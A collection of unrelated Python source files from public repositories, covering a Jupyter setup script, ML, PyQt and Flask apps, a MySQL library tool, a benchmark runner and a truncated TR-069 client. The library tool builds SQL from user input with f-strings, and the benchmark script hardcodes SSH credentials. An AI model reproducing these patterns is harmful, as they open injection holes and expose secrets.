res['keywords'].append(parts[0])\n return res\n\n\ndef fill_lines(lst, 
max_len=85):\n res, cur = [], \"\"\n for e in lst:\n if len(cur) + len(e) + 3 > max_len:\n res.append(cur)\n cur = \"\"\n cur += f\" '{e}'\"\n res.append(cur)\n return res\n\n\nif __name__ == '__main__':\n import sys\n kws = get_keywords_wabt(WABT_KEYWORDS_URL)\n assert(sum(len(x) for x in kws.values()) == 590)\n\n if len(sys.argv) > 1:\n print('\\n'.join(fill_lines(kws[sys.argv[1]])))\n else:\n for k, v in kws.items():\n print(k, '\\n', '\\n'.join(fill_lines(v)))\n","repo_name":"nverno/wat-ts-mode","sub_path":"script/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"7118306218","text":"import subprocess\nimport sys\nfrom pathlib import Path\n\nimport setuptools\n\nHERE = Path(__file__).parent.resolve()\n\n# The name of the project\nNAME = \"notebook\"\n\nlabext_name = \"@jupyter-notebook/lab-extension\"\nlab_extension_dest = HERE / NAME / \"labextension\"\nmain_bundle_dest = HERE / NAME / \"static\"\n\n# Representative files that should exist after a successful build\nensured_targets = [\n str(lab_extension_dest / \"static\" / \"style.js\"),\n str(main_bundle_dest / \"bundle.js\"),\n str(HERE / NAME / \"schemas/@jupyter-notebook/application-extension/package.json.orig\"),\n]\n\ndata_files_spec = [\n (\"share/jupyter/labextensions/%s\" % labext_name, str(lab_extension_dest), \"**\"),\n (\"share/jupyter/labextensions/%s\" % labext_name, str(HERE), \"install.json\"),\n (\"share/jupyter/lab/schemas\", f\"{NAME}/schemas\", \"@jupyter-notebook/**/*\"),\n (\n \"etc/jupyter/jupyter_server_config.d\",\n \"jupyter-config/jupyter_server_config.d\",\n \"notebook.json\",\n ),\n (\n \"etc/jupyter/jupyter_notebook_config.d\",\n \"jupyter-config/jupyter_notebook_config.d\",\n \"notebook.json\",\n ),\n]\n\ntry:\n from jupyter_packaging import get_data_files, npm_builder, wrap_installers\n\n # In develop mode, just run yarn\n builder = npm_builder(build_cmd=\"build\", npm=\"jlpm\", force=True)\n\n def post_develop(*args, **kwargs):\n builder(*args, **kwargs)\n try:\n subprocess.run([sys.executable, \"-m\", \"pre_commit\", \"install\"])\n subprocess.run(\n [sys.executable, \"-m\", \"pre_commit\", \"install\", \"--hook-type\", \"pre-push\"]\n )\n except Exception:\n pass\n\n cmdclass = wrap_installers(post_develop=post_develop, ensured_targets=ensured_targets)\n\n setup_args = dict(cmdclass=cmdclass, data_files=get_data_files(data_files_spec))\nexcept ImportError:\n setup_args = {}\n\n\nif __name__ == \"__main__\":\n setuptools.setup(**setup_args)\n","repo_name":"cbreland/altz","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18025287781","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 29 10:45:09 2018\n\n@author: 姜兴琪\n\"\"\"\n\nimport numpy as np\nfrom sklearn.cross_validation import train_test_split\nimport csv\nwith open(r'etf_data/c510050.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',') \n hearder=next(readCSV)\n X = [] \n y = [] \n for row in readCSV: \n X.append(np.array(row[0:6]))\n y.append(int(row[-1])) \nX=np.array(X)\nX=X.astype(float)\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3) \n\nX_train=np.array(X_train)\ny_train=np.array(y_train)\n\nX_test=np.array(X_test)\ny_test=np.array(y_test)\n\nprint (len(X_train),len(y_train))\nprint 
(len(X_test),len(y_test))\n\nfrom sklearn.tree import DecisionTreeClassifier\n# Train\nclf = DecisionTreeClassifier().fit(X_train, y_train)\na=clf.predict(X_test)\ns=0\nfor i in range(0,len(y_test)):\n if (a[i]-y_test[i])==0:\n s=s+1\nprint (s/len(y_test))","repo_name":"jxq0816/machine-learning-etf","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32474345712","text":"import sys\nimport csv\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QVBoxLayout, \\\n QComboBox, QFormLayout, QDialog, QLabel, QScrollArea, QHBoxLayout, QPushButton, QLineEdit, \\\n QAbstractItemView, QHeaderView, QFileDialog\nfrom PyQt5 import QtCore, QtGui\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\n# Create a QMainWindow subclass to represent the main application window\nclass MyWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n # Set the window title\n self.setWindowTitle(\"Load CSV File\")\n\n # Create a central widget for the main window\n self.central_widget = QWidget(self)\n self.setCentralWidget(self.central_widget)\n\n # Initialize the user interface\n self.init_ui()\n\n def init_ui(self):\n layout = QVBoxLayout()\n\n # Create a QLineEdit widget for entering the file path\n self.input = QLineEdit(self)\n layout.addWidget(self.input)\n\n # Create a \"Browse File\" button and connect it to the load_button_handler method\n self.load_button = QPushButton(\"Browse File\", self)\n self.load_button.clicked.connect(self.load_button_handler)\n layout.addWidget(self.load_button)\n\n # Set the layout for the central widget\n self.central_widget.setLayout(layout)\n\n # Initialize an empty data attribute\n self.data = []\n\n def load_button_handler(self):\n print(\"Load Initiated\")\n \n # Open a file dialog to select a CSV file\n file_path, _ = QFileDialog.getOpenFileName()\n \n if file_path:\n # Read the CSV file and its headers\n self.data, headers = self.read_csv_file(file_path)\n \n if self.data:\n # Open a custom dialog to customize the CSV data\n self.open_combo_box_dialog(headers)\n\n def read_csv_file(self, file_path):\n data = []\n headers = []\n try:\n with open(file_path, 'r') as infile:\n # Use the csv module to read the CSV file\n csv_reader = csv.reader(infile, delimiter=\",\")\n headers = next(csv_reader) # Get column headers\n data = list(csv_reader)\n except Exception as e:\n print(f\"Error reading CSV file: {str(e)}\")\n return data, headers\n\n def open_combo_box_dialog(self, headers):\n dialog = ComboBoxDialog(headers, self.data)\n dialog.setWindowTitle(\"Customize CSV Data\")\n dialog.exec_()\n\n# Create a custom QDialog subclass for customizing the CSV data\nclass ComboBoxDialog(QDialog):\n def __init__(self, headers, data):\n super().__init__()\n\n layout = QVBoxLayout()\n\n # Create \"Save Changes\" and \"Export File\" buttons\n self.save_button = QPushButton(\"Save Changes\", self)\n self.save_button.adjustSize()\n self.export_button = QPushButton(\"Export File\", self)\n self.export_button.adjustSize()\n \n # Connect button clicks to corresponding methods\n self.save_button.clicked.connect(self.save_button_handler)\n self.export_button.clicked.connect(self.export_button_handler)\n\n # Add buttons to the layout\n layout.addWidget(self.save_button)\n layout.addWidget(self.export_button)\n\n self.setLayout(layout)\n\n # Create a scroll area to display the CSV data\n self.scroll_area = 
QScrollArea()\n layout.addWidget(self.scroll_area)\n\n # Create a form layout for arranging widgets\n self.form_layout = QFormLayout()\n self.scroll_area.setWidgetResizable(True)\n self.scroll_area.setWidget(QWidget()) # Initialize the scroll area's widget\n \n self.combo_boxes = []\n self.text_entries = []\n self.currentVal = []\n self.headers = headers\n\n # Add labels for column headers\n header_row = QHBoxLayout()\n for header in headers:\n header_label = QLabel(header, self) # Create a label for each column header\n header_row.addWidget(header_label)\n\n # Add the header row to the form layout\n self.form_layout.addRow(header_row)\n\n # Populate the dialog with combo boxes and text entry fields\n self.populateComboBoxes(data)\n\n container_widget = QWidget()\n container_widget.setLayout(self.form_layout)\n self.scroll_area.setWidget(container_widget)\n\n # Populate the dialog with combo boxes and text entry fields\n def populateComboBoxes(self, data):\n for row in data:\n row_layout = QHBoxLayout()\n for col, value in enumerate(row):\n if col in [1, 2, 4, 5]: # Check if the column index should be a text entry\n text_entry = QLineEdit(self)\n text_entry.setText(value)\n text_entry.adjustSize()\n text_entry.setStyleSheet('background-color:yellow;')\n self.combo_boxes.append(text_entry)\n row_layout.addWidget(text_entry)\n else:\n combo_box = QComboBox(self)\n combo_box.setStyleSheet('background-color:aqua;')\n combo_box.addItems(set(data[i][col] for i in range(len(data))))\n combo_box.setCurrentText(value)\n self.combo_boxes.append(combo_box)\n row_layout.addWidget(combo_box)\n self.form_layout.addRow(row_layout)\n\n # Handle the \"Save Changes\" button click\n def save_button_handler(self):\n print(\"SAVING CURRENT EDITS\")\n self.currentVal = []\n for combo_box in self.combo_boxes:\n try:\n currText = combo_box.currentText()\n except AttributeError:\n currText = combo_box.text()\n self.currentVal.append(currText)\n print(\"Current Values:\", self.currentVal)\n\n def export_button_handler(self):\n print(\"EXPORTING FILE\")\n \n # Specify the desired file path for the exported CSV file\n file_path = \"exported_data.csv\"\n \n with open(file_path, 'w', newline='') as csvfile:\n csv_writer = csv.writer(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n # Write the headers\n csv_writer.writerow(self.headers)\n\n # Write the current values\n for i in range(0, len(self.currentVal), 6):\n row = self.currentVal[i:i + 6] # 6 columns for each of the rows and their headers\n csv_writer.writerow(row)\n\n print(\"Data has been exported to\", file_path)\n\n# Define the main function to run the application\ndef main():\n app = QApplication(sys.argv)\n window = MyWindow()\n window.resize(400, 100)\n window.show()\n sys.exit(app.exec_())\n\n# Entry point of the script\nif __name__ == \"__main__\":\n main()\n","repo_name":"OmarFloresE/Customizable-CSV-Parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14959672322","text":"from flask import Flask, render_template, request\nfrom psycopg2 import connect\nimport wikipedia\n\nwikipedia.set_lang(\"es\")\napp = Flask(__name__)\n\nconn = connect(\n dbname='postgres',\n user='postgres',\n password='1234',\n host='localhost'\n )\ncursor = conn.cursor()\n\ndef orden(lista):\n return int(lista[1])\n \n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/Busqueda', 
methods=['POST']) \ndef NuevaVenta():\n    if request.method == 'POST':\n        resultados = []\n        palabra = request.form['palabra']\n        # parameterized query to avoid SQL injection\n        query = \"SELECT documentos FROM buscador WHERE palabra = %s;\"\n        cursor.execute(query, (palabra,))\n        paginas = cursor.fetchall()\n        if paginas != []:\n            paginas = paginas[0][0].split(') (')\n            paginas[0] = paginas[0].replace('(','')\n            paginas[-1] = paginas[-1].replace(')','')\n            for x in paginas:\n                x = x.split(',')\n                x[1] = x[1].replace(' ','')\n                resultados.append(x)\n            resultados.sort(key=orden, reverse=True)\n\n            for x in range(len(resultados)):\n                page = wikipedia.page(resultados[x][0])\n                resultados[x].append(page.url)\n                resultados[x].append(page.title)\n\n            return render_template('index.html', paginas=resultados)\n        \n    return render_template('index.html')\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","repo_name":"gndonoso/Tarea3SD","sub_path":"cliente/api_cliente.py","file_name":"api_cliente.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31684556328","text":"\"\"\"\nmysql interaction and other main functions for the main.py file.\n\"\"\"\nimport os\nimport yaml\nimport mysql.connector\nimport random\nimport secrets\nimport json\nimport time\nimport string\n\n# -----------TABLE NAME--------------\nUSER_TABLE = 'lms_users' # allowed users table\nBOOKS_TABLE = 'books' # main library books catalog table\nDEBUG_TABLE = 'test_books' # table used temporarily for testing \n# ------------------------------------\n\ndef main_cnx(user_id='user'):\n    \"\"\"\n    function that returns the login connection using the\n    cnx_data.yml file\n    \"\"\"\n    # changing to the data directory\n    try:\n        if os.path.exists('cnx_data.yml') is False:\n            # os.chdir('..')\n            os.chdir('data')\n        with open('cnx_data.yml') as data_file:\n            data = yaml.load(data_file, yaml.SafeLoader)\n\n        cnx = mysql.connector.connect(**data[user_id])\n        return cnx\n    except FileNotFoundError:\n        # if the data directory is not found in the current directory,\n        # print a fatal error message and stop\n        print(\"FATAL ERROR: The directory 'data' does not exist, please recover the data directory\")\n        exit()\n\n\ndef pass_checker(user_data):\n    \"\"\"\n    check the user input against the registered users\n    in the database\n    :return: boolean value\n    \"\"\"\n    # starting the defined connection using the main_cnx() function\n    cnx = main_cnx()\n\n    cursor = cnx.cursor()\n    # executing the command using execute statement\n\n    cursor.execute(f'select * from {USER_TABLE}')\n    # getting the data in the desired form\n    database_data = cursor.fetchall()\n\n    # checking the database from the file data\n    if user_data in database_data:\n        return True\n    else:\n        # return false as the value if the password is wrong\n        return False\n\n\ndef display(table_name='books'):\n    \"\"\"\n    show the books (isbn, title, author) from the database\n    :param table_name:\n    :return:\n    \"\"\"\n    # initiating the connection\n    cnx = main_cnx()\n    cursor = cnx.cursor()\n\n    # executing the sql statement for the data\n    cursor.execute(f\"select * from {table_name}\")\n\n    # printing the data form stored in the cursor\n    for lines in cursor:\n        print(f'{lines[0]:14} {lines[1]:45}by {lines[2]}')\n\n\ndef search_on_isbn(isbn_number: str):\n    \"\"\"\n    searching using the isbn of the book\n    :return:\n    \"\"\"\n    cnx = main_cnx()\n    cursor = cnx.cursor()\n    if isbn_number.isnumeric():\n        cursor.execute(f\"select * from {BOOKS_TABLE} where isbn = {isbn_number!r}\")\n        # fetching the data from the database\n        data = 
cursor.fetchall()\n # checking for empty data\n if not data:\n print(f\"Sorry no book is found having ISBN {isbn_number}\")\n else:\n # if the book is found print found\n print('Found')\n print(f\"\"\"\n ISBN: {data[0][0]}\n Title: {data[0][1]}\n Author: {data[0][2]}\n Published: {data[0][3]}\"\"\")\n else:\n print(\"Please enter a number to search\")\n\n\ndef search_on_author(author_name: str):\n \"\"\"\n searching function using the author name\n :return:\n \"\"\"\n\n cnx = main_cnx()\n cursor = cnx.cursor()\n cursor.execute(f\"SELECT book_name, published from {BOOKS_TABLE} where author = {author_name!r}\")\n data = cursor.fetchall()\n # printing the data retrieved from database\n # listing of the all the books from the author\n if data:\n print(f\"Books by {author_name}\")\n print(f\"Title {'-'*35}Publishing date\")\n for books in data:\n print(f\"{books[0]:40} {books[1]:5}\")\n else:\n print(f\"Author {author_name!r} not found\\nPlease check for any typos in the author name and try again\")\n\n\ndef search_on_title(book_name: str):\n \"\"\"\n searching the books in the database using the sql query like functionality\n :param book_name:\n :return:\n \"\"\"\n\n cnx = main_cnx()\n cursor = cnx.cursor()\n\n # executing the query for searching the books database using the title of the book\n cursor.execute(f\"SELECT book_name, published, author from {BOOKS_TABLE} where book_name like {book_name+'%'!r}\")\n\n # get the returned data and store it in the data variable\n data = cursor.fetchall()\n\n # if there is data in the variable data\n if data:\n print(\"Found\")\n for books in data:\n print(f\"{books[0]:40} {books[1]}, by {books[2]}\")\n\n return True\n\n # else if the value is not found give this message\n else:\n print(f\"Not Found with title {book_name!r}\")\n return False\n\n\ndef add_books(verify_user):\n \"\"\"\n Adding the books by the user as a contribution to the project database\n helping it to grow to a more vast book library\n :param verify_user:\n :return:\n \"\"\"\n if pass_checker(verify_user) is False:\n print(\"Sorry the credentials are wrong\")\n else:\n cnx = main_cnx()\n # making the cursor\n cursor = cnx.cursor()\n # asking the details of the books by the valid user\n while True:\n try:\n print(\"Enter the following details of the book exit to leave \\n\")\n ask_isbn = input(\"Enter the isbn number \").strip().casefold()\n if ask_isbn in ['exit', 'quit']:\n break\n ask_book_name = input(\"Enter the book name \").strip()\n ask_author = input(f\"Enter the Author of the book {ask_book_name!r} \").title().strip()\n ask_year = input(\"Enter the year of publishing \")\n # if no exception occurs break the loop\n # ------tmp-----##\n cursor.execute(f\"insert into {DEBUG_TABLE} values ({ask_isbn!r}, {ask_book_name!r}, {ask_author!r},\"\n f\" {ask_year})\")\n # executing the changes to the table\n cnx.commit()\n print(\"*Successfully* added the book to the library thanks for the contribution \\n\"\n \"help this project to grow.\\n\")\n\n except (mysql.connector.errors.DatabaseError, mysql.connector.errors.InterfaceError):\n print(f\" {'*'*9}SORRY! 
there was an error, sorry for the inconvenience {'*'*9}\")\n print(f\"{'*'*9}Please enter a number value for the publishing year{'*'*9}\")\n\n\ndef explore():\n \"\"\"\n exploring the data of the LMS database\n :return:\n \"\"\"\n\n # initiate the connection\n cnx = main_cnx()\n\n cursor = cnx.cursor()\n\n # getting data for the author\n cursor.execute(f\"select author from {BOOKS_TABLE}\")\n author = cursor.fetchall()\n\n # getting the number of books in the database\n cursor.execute(f'select count(*) from {BOOKS_TABLE}')\n times = cursor.fetchall()\n\n # getting the old books in database\n cursor.execute(f'select book_name, author from {BOOKS_TABLE} where published < 2000 ')\n old = cursor.fetchall()\n\n # processing the retried values\n classic_time = random.randint(0, len(old) - 1)\n random_author = author[random.randint(0, len(author) - 1)][0]\n classic_book = old[classic_time][0]\n classic_author = old[classic_time][1]\n total_books = times[0][0]\n\n # printing the result in Command line using the formatted string\n print(f\"\"\"\n +{'-' * 30}LIBRARY MANAGEMENT SYSTEM{'-' * 30}+\n |{\" \"*85}|\n | Read `By Authors like{\" \"*61}| \n | {random_author}{\" \"*(91 - (8 + 1 + len(random_author)))}| \n | ``````` Total books in library {total_books} ```````{\" \"*(91- (49+len(str(total_books))))}|\n | ~Time less classics{\" \"*63}|\n | {classic_book} by' {classic_author}{\" \"*(91 - (17+1+len(classic_author)+len(classic_book)))}|\n |{\" \"*85}|\n +{'-' * 30}{'*' * 25}{'-' * 30}+\n \"\"\")\n\n\ndef logit(message=''):\n \"\"\"\n logging the events happened in the LMS in the separate file\n called logfile\n :param message: str\n :return: number_id -> str\n \"\"\"\n\n # if the file logfile.log does not exist create the new file named logfile.log\n if os.path.exists('logfile.log') is False:\n with open('logfile.log', 'x') as _:\n pass\n\n # generating the random number\n number_id = ' '.join(secrets.choice(string.digits) for _ in range(5))\n # making the log data\n log_data = [time.asctime(time.localtime()), number_id, message]\n\n # using the json to dump the list into a file and adding the new line after each dump\n with open('logfile.log', 'a') as log_file:\n # dumping the list of the log data to the log file\n json.dump(log_data, log_file)\n # adding the new line at the end of the file\n log_file.write('\\n')\n\n return number_id\n","repo_name":"Croc-1/Project-Bloodymarry","sub_path":"lms/sql_util.py","file_name":"sql_util.py","file_ext":"py","file_size_in_byte":8670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25388802359","text":"import time\nimport os\nfrom typing import Callable\n\nfrom scalablerunner.taskrunner import TaskRunner\nfrom scalablerunner.adapter import DBRunnerAdapter\nfrom cost_estimator import Loader\n\nSERVER_COUNT_LOAD = 4\nSERVER_COUNT_BENCH = 1\nDEST_DIR = '/opt/shared-disk2/sychou/dynamic_rnn/temp_exp'\n\ndef get_temp_dir():\n # Create 'temp' directory\n temp_dir = 'temp'\n if not os.path.exists(temp_dir):\n os.makedirs(temp_dir)\n\n return temp_dir\n\ndef get_dataset_dir():\n # Create 'temp' directory\n temp_dir = 'dataset'\n if not os.path.exists(temp_dir):\n os.makedirs(temp_dir)\n\n return temp_dir\n\ndef config_db_runner_adapter(db_runner_adapter: DBRunnerAdapter, server_count: int) -> DBRunnerAdapter:\n db_runner_adapter.config(server_count=server_count, jar_dir='latest', sequencer=\"192.168.1.32\", \n servers=[\"192.168.1.31\", \"192.168.1.30\", \"192.168.1.27\", \"192.168.1.26\"], \n # 
servers=[\"192.168.1.31\"], \n clients=[\"192.168.1.9\", \"192.168.1.8\"], \n # clients=[\"192.168.1.9\"], \n package_path='/home/db-under/sychou/autobench/package/jdk-8u211-linux-x64.tar.gz',\n base_config='configs/lock_overhead_exp/bencher.toml')\n return db_runner_adapter\n\ndef naming(alts: dict):\n rte = alts['vanillabench']['org.vanilladb.bench.BenchmarkerParameters.NUM_RTES']\n return f'rte-{rte}'\n\ndef name_fn(reports_path: str, alts: dict):\n # rw = alts['elasqlbench']['org.elasql.bench.benchmarks.ycsb.ElasqlYcsbConstants.RW_TX_RATE']\n rw_dir = os.path.join(reports_path, naming(alts=alts))\n if not os.path.isdir(rw_dir):\n os.makedirs(rw_dir) \n return rw_dir\n\ndef move2share_fn(reports_path: str, name_fn: Callable, alts: dict, base_config: str):\n dir_name = naming(alts=alts)\n src_path = name_fn(reports_path=reports_path, alts=alts)\n dest_dir = DEST_DIR\n dest_path = os.path.join(dest_dir, dir_name)\n\n os.system(f\"rm -rf {dest_path}; mv {src_path} {dest_dir}\")\n\ndef process_dataset():\n dest_path = DEST_DIR\n total_count = 3\n count = 0\n\n done_map = {}\n\n while count < total_count:\n if os.path.isdir(dest_path):\n files = os.listdir(dest_path)\n for f in files:\n fullpath = os.path.join(dest_path, f, 'reports')\n # if os.path.isfile(fullpath):\n # print(\"File: \", f)\n if os.path.isdir(fullpath) and (not done_map.get(fullpath, False)):\n print(\"Folder: \", f)\n loader = Loader(f'{fullpath}', server_count=SERVER_COUNT_BENCH, n_jobs=8)\n df_features = loader.load_features_as_df(auto_save=True)\n df_latencies = loader.load_latencies_as_df(auto_save=True)\n\n done_map[f'{fullpath}'] = True\n count += 1\n time.sleep(5)\n\ndef upload_jars(dra: DBRunnerAdapter, server_jar: str, client_jar: str, use_stable: bool):\n dra.upload_jars(server_jar=server_jar, client_jar=client_jar, use_stable=use_stable)\n\nif __name__ == '__main__':\n HOSTNAME = \"140.114.85.15\"\n USERNAME = \"db-under\"\n PASSWORD = \"db-under\"\n\n PORT = 22\n SSH_DEFAULT_RETRY_COUT = 3\n SSH_DEFAULT_CMD_RETRY_COUT = 2\n SSH_DEFAULT_IS_RAISE_ERR = False\n WORKSPACE_NAME = 'Lock_Overhead'\n\n dra = DBRunnerAdapter(reports_path=get_dataset_dir(), workspace=WORKSPACE_NAME)\n # Log file name\n dra.output_log(file_name='temp/total.log')\n # Connect to the remote host, where Auto-Bencher loactes\n dra.connect(hostname=HOSTNAME, username=USERNAME, password=PASSWORD, port=PORT)\n\n # Setting behaviors of the DBRunnerAdapter\n # Whether raise exception or not while error occur\n dra.set_default_is_raise_err(default_is_raise_err=SSH_DEFAULT_IS_RAISE_ERR)\n # The retrying count while the SSH connection fails\n dra.set_default_retry_count(default_retry_count=SSH_DEFAULT_RETRY_COUT)\n # The redoing count while the SSH command failed\n dra.set_default_cmd_retry_count(default_cmd_retry_count=SSH_DEFAULT_CMD_RETRY_COUT)\n\n\n ARGS_LOAD = {\n # \"elasqlbench\": {\n # \"org.elasql.bench.benchmarks.ycsb.ElasqlYcsbConstants.INIT_RECORD_PER_PART\": \"100000\"\n # }\n \"elasqlbench\":\n {\n \"org.elasql.bench.benchmarks.tpcc.ElasqlTpccConstants.WAREHOUSE_PER_PART\": \"5\",\n }\n }\n\n ARGS_BENCH = {\n \"vanillabench\": {\n \"org.vanilladb.bench.BenchmarkerParameters.BENCHMARK_INTERVAL\": \"180000\",\n },\n \"elasql\": {\n \"org.elasql.perf.tpart.TPartPerformanceManager.ENABLE_COLLECTING_DATA\": \"true\"\n },\n \"elasqlbench\": {\n \"org.elasql.bench.benchmarks.tpcc.ElasqlTpccConstants.WAREHOUSE_PER_PART\": \"5\",\n # \"org.elasql.bench.benchmarks.ycsb.ElasqlYcsbConstants.INIT_RECORD_PER_PART\": \"100000\",\n # 
\"org.elasql.bench.benchmarks.ycsb.ElasqlYcsbConstants.RW_TX_RATE\": \"1\"\n }\n }\n\n # Custom parameters\n # [Class, Parameter name, Value]\n PARAMS = [\n [\"vanillabench\", \"org.vanilladb.bench.BenchmarkerParameters.NUM_RTES\", \"100\"],\n # [\"vanillabench\", \"org.vanilladb.bench.BenchmarkerParameters.NUM_RTES\", \"130\"],\n # [\"vanillabench\", \"org.vanilladb.bench.BenchmarkerParameters.NUM_RTES\", \"45\"]\n ]\n\n # Base configurations\n LOAD_CONFIG = 'configs/lock_overhead_exp/load.toml'\n \n BENCH_CONFIG = 'configs/lock_overhead_exp/bench.toml'\n \n # dra = config_db_runner_adapter(dra, server_count=SERVER_COUNT_LOAD)\n # config = {\n # f'Section Initialize': {\n # 'Group Initialize': {\n # 'Call': dra.init_autobencher_load_test_bed,\n # 'Param': {\n # 'server_jar': ['stable_jars/server.jar'], \n # 'client_jar': ['stable_jars/client.jar'],\n # 'alts': [ARGS_LOAD],\n # 'base_config': [LOAD_CONFIG],\n # # An arbitrary name for the parameter that want to modify. You can give multiple custom parameters.\n # # 'custom_param1': PARAMS,\n # }\n # },\n # },\n # }\n # tr = TaskRunner(config=config)\n # tr.run()\n\n dra = config_db_runner_adapter(dra, server_count=SERVER_COUNT_BENCH)\n dra.upload_jars(server_jar='jars/server.jar', client_jar='jars/client.jar', use_stable=True)\n config = {\n f'Section Benchmark': {\n 'Group Benchmark': {\n 'Call': dra.benchmark,\n 'Param': {\n 'name_fn': [name_fn],\n 'alts': [ARGS_BENCH],\n 'base_config': [BENCH_CONFIG],\n # An arbitrary name for the parameter that want to modify. You can give multiple custom parameters.\n 'custom_param1': PARAMS,\n 'callback_fn': [move2share_fn],\n }\n },\n 'Group Process Dataset': {\n 'Call': process_dataset,\n },\n }\n }\n tr = TaskRunner(config=config)\n tr.run()","repo_name":"Database-Project-2021/dynamicRNN","sub_path":"data_collection/lock_overhead_exp.py","file_name":"lock_overhead_exp.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34725709036","text":"from collections import namedtuple\r\n\r\n\r\ndef get_changes(object):\r\n \"\"\"\r\n Função para pegar as mudanças ocorridas em um objeto.\r\n\r\n Deve ser chamada dentro de uma função save.\r\n Parâmetros:\r\n object: objeto que você deseja saber as mudanças.\r\n Retorno:\r\n namedtuple: com os campos:\r\n normais: Lista com os nomes dos campos que mudaram.\r\n back: Lista com os objetos dos campos que mudaram.\r\n old_and_new_object: Dicionário com os campos:\r\n old_object: Objeto antes do save.\r\n new_object: Objeto durante o save.\r\n \"\"\"\r\n object_class = object.__class__\r\n old_object = object_class.objects.get(pk=object.pk)\r\n new_object = object\r\n mudancas = namedtuple(\r\n \"mudancas\", [\"normais\", \"back\", \"old_and_new_object\"]\r\n )\r\n\r\n def houve_mudanca_normal(field):\r\n \"\"\"Retorna o nome do campo se houve mudança e None se não houve.\"\"\"\r\n try:\r\n if getattr(old_object, field.name) != getattr(\r\n new_object, field.name\r\n ):\r\n return field.name\r\n except AttributeError:\r\n ...\r\n\r\n def houve_mudanca_back(field):\r\n try:\r\n if getattr(old_object, field.name) != getattr(\r\n new_object, field.name\r\n ):\r\n return field\r\n except AttributeError:\r\n ...\r\n\r\n change_normal_fields = list(\r\n filter(\r\n campo_valido,\r\n map(\r\n houve_mudanca_normal,\r\n object._meta.fields,\r\n ),\r\n )\r\n )\r\n\r\n change_back_fields = list(\r\n filter(\r\n campo_valido,\r\n map(\r\n houve_mudanca_back,\r\n 
object._meta.get_fields(),\r\n ),\r\n )\r\n )\r\n old_and_new_object = {\"old_object\": old_object, \"new_object\": new_object}\r\n\r\n return mudancas(\r\n change_normal_fields, change_back_fields, old_and_new_object\r\n )\r\n\r\n\r\ndef campo_valido(field):\r\n \"\"\"Retorna True se o campo for válido e False se não for.\"\"\"\r\n return True if field else False\r\n","repo_name":"TimeNovaData/novadata_utils","sub_path":"novadata_utils/save/get_changes.py","file_name":"get_changes.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12151223595","text":"import warnings\n\nimport requests\nimport requests.auth\nfrom typing import List, Tuple, Any, Dict, Union, Optional\n\nfrom tr069 import util\nfrom tr069.data import device as mdevice\nfrom tr069.data import rpcs\nfrom tr069.data import soap\n\n\ndef _wrap_rpc(rpc):\n \"\"\"\n Copy documentation and annotations from RPC function\n so that they are available from help(Client)\n \"\"\"\n\n def decorator(fn):\n fn.__doc__ = rpc.__doc__\n fn.__annotations__ = rpc.__annotations__.copy()\n fn.__annotations__[\"return\"] = requests.Response\n return fn\n\n return decorator\n\n\nclass Client:\n \"\"\"A TR-069 Client instance to interact with an ACS.\"\"\"\n\n acs_url: str\n requests_kwargs: Dict[str, Any]\n device: mdevice.Device\n log: bool\n _session: requests.Session\n messages: List[requests.Response]\n\n def __init__(\n self,\n acs_url: str,\n device: mdevice.Device = mdevice.DEFAULT,\n *,\n log: bool = True,\n basic_auth: Optional[Tuple[str, str]] = None,\n digest_auth: Optional[Tuple[str, str]] = None,\n cert: Union[Tuple[str, str], str] = None,\n **requests_kwargs\n ):\n \"\"\"\n Args:\n acs_url: The ACS URL.\n device: The device represented by the client.\n log: If True, all requests and responses are logged to stdout.\n basic_auth: A (user, pass) tuple used for HTTP basic authentication.\n digest_auth: A (user, pass) tuple used for HTTP digest authentication.\n cert: TLS Client Certificate, see http://docs.python-requests.org/en/master/user/advanced/#ssl-cert-verification\n **requests_kwargs: Additional arguments passed to subsequent internal calls of requests.post().\n \"\"\"\n self.acs_url = acs_url\n self.device = device\n self.log = log\n\n # auth and cert are actually just added explicitly to improve the documentation.\n if [basic_auth, digest_auth, requests_kwargs.get(\"auth\", None)].count(None) < 2:\n raise ValueError(\n \"auth, basic_auth and digest_auth authentication are mutually exclusive.\")\n if basic_auth:\n requests_kwargs[\"auth\"] = requests.auth.HTTPBasicAuth(*basic_auth)\n if digest_auth:\n requests_kwargs[\"auth\"] = requests.auth.HTTPDigestAuth(*digest_auth)\n\n if cert:\n requests_kwargs[\"cert\"] = cert\n self.requests_kwargs = requests_kwargs\n self._session = requests.Session()\n self.messages = []\n\n @staticmethod\n def _default_headers(data: str):\n default_headers = {\n \"User-Agent\": None,\n }\n\n # TR-069 3.4.1: An empty HTTP POST MUST NOT contain a Content-Type header\n if data:\n default_headers[\"Content-Type\"] = 'text/xml; charset=\"utf-8\"'\n\n # Add proper SOAPAction header (TR-069 3.4.1)\n soap_action = soap.extract_rpc_name(data)\n if soap_action:\n if \"Response\" in 